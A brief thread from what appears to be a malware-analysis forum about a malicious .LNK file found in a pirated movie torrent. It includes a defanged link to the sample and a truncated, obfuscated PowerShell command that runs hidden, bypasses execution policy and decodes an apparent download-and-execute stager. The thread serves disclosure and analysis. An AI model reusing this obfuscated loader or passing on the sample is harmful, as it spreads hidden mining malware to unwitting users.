A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32464  by Haruhi
 Wed Jan 16, 2019 8:29 pm
One torrent in ThePirateBay, of a new release carry a ".LNK" file. This file contains a lot of information. Is a powershell virus capable of cryptocurrency mining.

Movie: The_girl_in_the_spider_web. Researcher: @0xffff0800

hxxps://mega.nz/#!N80XUCza!rgQMgunzj8qHHlVDCypxBXNrNYa_ZE8oDk3LatADBwg enjoy.

+2.000 seeders :|
 #32470  by hackr8
 Thu Jan 17, 2019 11:49 am
Raw code:
Code: Select all
powershell.exe -NoPr -WINd 1 -eXEc ByP   iex ("$( SeT-ITeM  'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101

AV detection: https://www.virustotal.com/#/file/9e5a3 ... /detection
Attachments
(216 Bytes) Downloaded 22 times